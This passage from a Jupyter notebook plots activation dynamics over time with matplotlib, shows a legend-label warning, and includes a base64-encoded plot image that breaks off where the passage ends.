"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,a_dynamics,c='magenta')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Activation dynamics')\n",
"\n",
"\n",
"ax.legend()"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {
"scrolled": false
},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/opt/miniconda3/lib/python3.6/site-packages/matplotlib/axes/_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots.\n",
" warnings.warn(\"No labelled objects found. \"\n"
]
},
{
"data": {
"image/png": "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